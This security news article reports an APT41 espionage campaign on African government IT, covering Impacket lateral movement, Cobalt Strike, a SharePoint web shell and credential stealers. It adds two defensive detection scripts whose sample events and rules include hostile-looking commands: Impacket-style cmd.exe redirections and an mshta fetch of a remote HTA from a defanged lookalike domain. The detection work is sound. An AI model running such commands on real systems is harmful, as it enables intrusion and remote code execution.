
The China-linked cyber espionage group tracked as APT41 has been attributed to a new campaign targeting government IT services in Africa.
"The attackers used hard-coded names of internal services, IP addresses, and proxy servers embedded within their malware," said Kaspersky researchers Denis Kulik and Daniil Pogorelov. "One of the C2s [command-and-control servers] was a captive SharePoint server within the victim's infrastructure."
APT41 is the moniker assigned to a prolific Chinese nation-state hacking group known for targeting organizations across multiple sectors, including telecom and energy providers, educational institutions, healthcare organizations, and IT companies, in more than three dozen countries.
What is notable about the campaign is its focus on Africa, which, as the Russian cybersecurity vendor pointed out, had "experienced the least activity" from this particular threat actor. That said, the findings line up with previous observations from Trend Micro that the continent has found itself in the group's crosshairs since late 2022.

Kaspersky said its investigation began after "suspicious activity" was detected on several workstations associated with the unnamed organization's IT infrastructure.
"It turned out that the source of the suspicious activity was an unmonitored host that had been compromised," the researchers noted. "Impacket was executed in the context of a service account. After the Atexec and WmiExec modules had finished running, the attacker temporarily suspended their operations."
Soon after, the attacker is said to have harvested credentials associated with privileged accounts to facilitate privilege escalation and lateral movement, and eventually deployed Cobalt Strike for C2 communication, loading it via DLL side-loading.

The malicious DLLs include checks that verify which language packs are installed on the host and proceed with execution only if none of the following are detected: Japanese (Japan), Korean (South Korea), Chinese (mainland China), and Chinese (Taiwan).
The attack is also characterized by the use of a compromised SharePoint server for C2, which the attackers use to send commands to be executed by C#-based malware uploaded to the victim hosts.
"They communicated with the server via the SMB protocol and distributed files named agents.exe and agentx.exe," Kaspersky explained. "Each of these files is actually a C# trojan whose main function is to execute commands received from a web shell named CommandHandler.aspx installed on the SharePoint server."
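A trojan that waits for commands from a web shell has to poll that page, and the polling shows up in the SharePoint front end's own IIS logs. The script below is an added example written for this article, not Kaspersky's or the attackers' code: it parses W3C-format IIS log text, flags any .aspx under /_layouts/ that is not in a baseline of known pages, and looks for client/URI pairs that are requested on a steady timer. The log lines, the client addresses and the short baseline list are constructed for the demo; a real baseline should be taken from a known-good server, and the web shell name is the one named in the quote above.

```python
"""Hunt IIS W3C logs on a SharePoint server for web-shell style C2 polling.

Added example, not the article's or Kaspersky's code. Assumptions: the front
end writes standard IIS W3C logs with a #Fields header; BASELINE_LAYOUTS is a
stand-in for a baseline built from a clean SharePoint install.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Pages a clean LAYOUTS directory is expected to serve (assumed, deliberately short).
BASELINE_LAYOUTS = {"/_layouts/15/start.aspx", "/_layouts/15/authenticate.aspx"}

MIN_REQUESTS = 5   # fewer samples make the cadence statistic meaningless
MAX_JITTER = 0.2   # stdev/mean of inter-request gaps; a trojan polls on a timer

# Constructed sample: one internal host hits CommandHandler.aspx every 60 s
# (the trojan waiting for commands) among ordinary SharePoint traffic.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2025-07-01 08:00:00 10.0.0.25 POST /_layouts/15/CommandHandler.aspx 200
2025-07-01 08:00:10 10.0.0.31 GET /sites/hr/SitePages/Home.aspx 200
2025-07-01 08:01:00 10.0.0.25 POST /_layouts/15/CommandHandler.aspx 200
2025-07-01 08:01:30 10.0.0.31 GET /_layouts/15/start.aspx 200
2025-07-01 08:02:00 10.0.0.25 POST /_layouts/15/CommandHandler.aspx 200
2025-07-01 08:02:15 10.0.0.31 GET /_layouts/15/start.aspx 200
2025-07-01 08:03:00 10.0.0.25 POST /_layouts/15/CommandHandler.aspx 200
2025-07-01 08:04:00 10.0.0.25 POST /_layouts/15/CommandHandler.aspx 200
2025-07-01 08:05:00 10.0.0.25 POST /_layouts/15/CommandHandler.aspx 200
"""


def parse_iis_log(text):
    """Parse W3C-format IIS log text into dicts keyed by the #Fields header."""
    fields, events = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # unmappable line; real logs may need extra quoting rules
        rec = dict(zip(fields, values))
        rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        events.append(rec)
    return events


def find_unexpected_layout_pages(events):
    """Any .aspx under /_layouts/ missing from the baseline is a web-shell candidate."""
    hits = set()
    for e in events:
        uri = e["cs-uri-stem"].lower()
        if uri.startswith("/_layouts/") and uri.endswith(".aspx") and uri not in BASELINE_LAYOUTS:
            hits.add(e["cs-uri-stem"])
    return sorted(hits)


def find_regular_polling(events):
    """Return (client, uri, mean_gap_seconds) for pairs requested on a steady timer."""
    by_pair = defaultdict(list)
    for e in events:
        by_pair[(e["c-ip"], e["cs-uri-stem"])].append(e["ts"])
    findings = []
    for (client, uri), stamps in by_pair.items():
        if len(stamps) < MIN_REQUESTS:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= MAX_JITTER:
            findings.append((client, uri, avg))
    return findings


if __name__ == "__main__":
    evts = parse_iis_log(SAMPLE_LOG)
    print("unexpected layout pages:", find_unexpected_layout_pages(evts))
    print("regular polling:", find_regular_polling(evts))
```

Both checks are cheap enough to run over a day of logs; the cadence check is the more robust of the two, because renaming the web shell defeats the baseline comparison but not the timer the trojan polls on.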

This approach blends traditional malware deployment with living-off-the-land tactics in which trusted services like SharePoint are turned into covert control channels. Such behavior is harder to detect with signature-based tools alone, and it maps to techniques catalogued under MITRE ATT&CK, including T1071.001 (Web Protocols) and T1047 (Windows Management Instrumentation).
Additionally, the threat actors were found to carry out follow-on activity on machines deemed valuable after initial reconnaissance. This is done by running a cmd.exe command that downloads a malicious HTML Application (HTA) file containing embedded JavaScript from an external resource and executes it with mshta.exe.
The exact nature of the payloads delivered via the external URL, which impersonates GitHub ("github.githubassets[.]net") to evade detection, is currently unknown. However, analysis of scripts previously distributed shows that they are designed to spawn a reverse shell, giving the attacker the ability to execute commands on the infected system.
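Two of the behaviours in this article leave distinctive process-creation traces: the Impacket Atexec and WmiExec runs mentioned earlier, and the mshta.exe download-and-execute described above. The script below is an added example, not the article's or Kaspersky's code, that applies three rules to Sysmon Event ID 1 style records. The events are constructed JSON lines modelled on Sysmon fields (the HTA path and the user names are invented, and the lookalike domain is kept defanged as the article prints it); the command-line patterns are the defaults that Impacket's wmiexec.py and atexec.py emit (output redirected to ADMIN$ on loopback, and a .tmp file under the Windows Temp directory run from a scheduled task), which an operator can change, so treat the rules as a starting point rather than a signature.

```python
"""Flag Impacket-style lateral movement and remote-HTA execution in Sysmon
Event ID 1 (process creation) records.

Added example, not the article's or Kaspersky's code. Events are constructed;
the patterns are Impacket defaults and are heuristics, not proof.
"""
import json
import re

# Constructed sample records (Sysmon field names, values invented for the demo).
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    # wmiexec: WmiPrvSE spawns cmd.exe with output redirected into ADMIN$ on loopback
    {"ProcessId": 4412, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1751356800.12 2>&1",
     "User": "CORP\\svc-backup"},
    # atexec: the Schedule service (svchost) runs cmd.exe writing output to a temp file
    {"ProcessId": 4420, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "cmd.exe /C hostname > C:\\Windows\\Temp\\NmSlsu.tmp 2>&1",
     "User": "NT AUTHORITY\\SYSTEM"},
    # mshta launched by cmd.exe with a remote HTA (domain defanged, file name assumed)
    {"ProcessId": 5100, "Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "mshta.exe https://github.githubassets[.]net/update.hta",
     "User": "CORP\\jdoe"},
    # benign: a logon script started from the user's shell, must not alert
    {"ProcessId": 5200, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "cmd.exe /c \\\\fileserver\\netlogon\\map_drives.bat",
     "User": "CORP\\jdoe"},
])


def _image_is(path, name):
    return path.lower().endswith("\\" + name)


def rule_impacket_wmiexec(e):
    """WMI provider host spawning cmd.exe that writes to \\\\127.0.0.1\\ADMIN$\\__<time>."""
    return _image_is(e["ParentImage"], "wmiprvse.exe") and bool(
        re.search(r"\\\\127\.0\.0\.1\\admin\$\\__\d", e["CommandLine"], re.I))


def rule_impacket_atexec(e):
    """Scheduled-task cmd.exe redirecting into <windir>\\Temp\\<name>.tmp 2>&1."""
    return (_image_is(e["ParentImage"], "svchost.exe")
            and _image_is(e["Image"], "cmd.exe")
            and bool(re.search(r"/c .*> .*\\temp\\\w+\.tmp 2>&1", e["CommandLine"], re.I)))


def rule_mshta_remote_hta(e):
    """mshta.exe given an http(s) URL: an HTA fetched from outside the host."""
    return _image_is(e["Image"], "mshta.exe") and bool(
        re.search(r"https?://\S+", e["CommandLine"], re.I))


RULES = [
    ("impacket_wmiexec", rule_impacket_wmiexec),
    ("impacket_atexec", rule_impacket_atexec),
    ("mshta_remote_hta", rule_mshta_remote_hta),
]


def parse_events(text):
    """One JSON object per line, as an EDR or SIEM export would hand them over."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events):
    """Return (rule_name, ProcessId, User) for every event that matches a rule."""
    alerts = []
    for e in events:
        for name, matches in RULES:
            if matches(e):
                alerts.append((name, e["ProcessId"], e["User"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The wmiexec and atexec rules key on the parent process as much as on the command line, since both parents (WmiPrvSE.exe and the Schedule service's svchost.exe) are unusual launchers of cmd.exe on a workstation; the service account in the first record is the kind of context the Kaspersky quote above describes.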

Also used in the attack are stealers and credential-harvesting utilities that collect sensitive data and exfiltrate it via the SharePoint server. Some of the tools deployed by the adversary are listed below:
- Pillager, in a modified version, to steal credentials from browsers, databases, and administrative utilities such as MobaXterm; source code; screenshots; chat sessions and data; email messages; SSH and FTP sessions; a list of installed apps; the output of the systeminfo and tasklist commands; and account information from chat apps and email clients
- Checkout to steal information about downloaded files and credit card data stored in web browsers such as Yandex, Opera, Vivaldi, Google Chrome, Brave, and Cốc Cốc
- RawCopy to copy raw registry files
- Mimikatz to dump account credentials
"Attackers are armed with an extensive arsenal of both custom-built and publicly available tools," Kaspersky said. "Notably, they use penetration testing tools such as Cobalt Strike at various stages of the attack."
"They can quickly adapt to the target's infrastructure, updating their malicious tools to account for its specific characteristics. They can also leverage internal services for C2 communication and data exfiltration."
The operation also highlights the blurred line between red team tooling and real-world adversary activity. The threat actor's use of public frameworks such as Impacket, Mimikatz, and Cobalt Strike alongside custom implants poses challenges for detection teams focused on lateral movement, credential access, and defense evasion across Windows environments.